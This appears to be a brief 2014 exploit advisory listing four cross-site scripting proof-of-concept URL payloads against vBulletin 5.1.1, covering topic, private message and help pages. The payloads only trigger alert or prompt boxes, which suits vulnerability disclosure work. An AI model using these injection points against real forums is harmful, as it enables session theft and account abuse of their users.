vBulletin 5.1 Cross Site Scripting

`Exploit Title: vBulletin 5.1 Multiple XSS vulnerabilities  
Authors: Romanian Security Team  
Website: https://rstforums.com/forum/  
Date published: 19 April 2014  
Software: vBulletin  
Version: 5.1.1 Alpha 9  
  
[XSS] Random topic  
  
- https://website.com/[forum_path]/forum/anunturi-importante/rst-power/67030-rst-admin-restore?view=stream1337";alert(123);//  
  
[XSS] New private message  
  
- https://website.com/[forum_path]/privatemessage/new/9999"><input onfocus=alert(1) autofocus>  
  
[XSS] View PM: you must know or bruteforce private message ID (830372)  
  
- https://website.com/[forum_path]/privatemessage/view/830372?folderid=random";alert(1);//  
  
[DOM XSS] Help  
  
- https://website.com/[forum_path]/help#'"><img src=x onerror=prompt("PoC")>  
  
(c) Romanian Security Team 2014  
`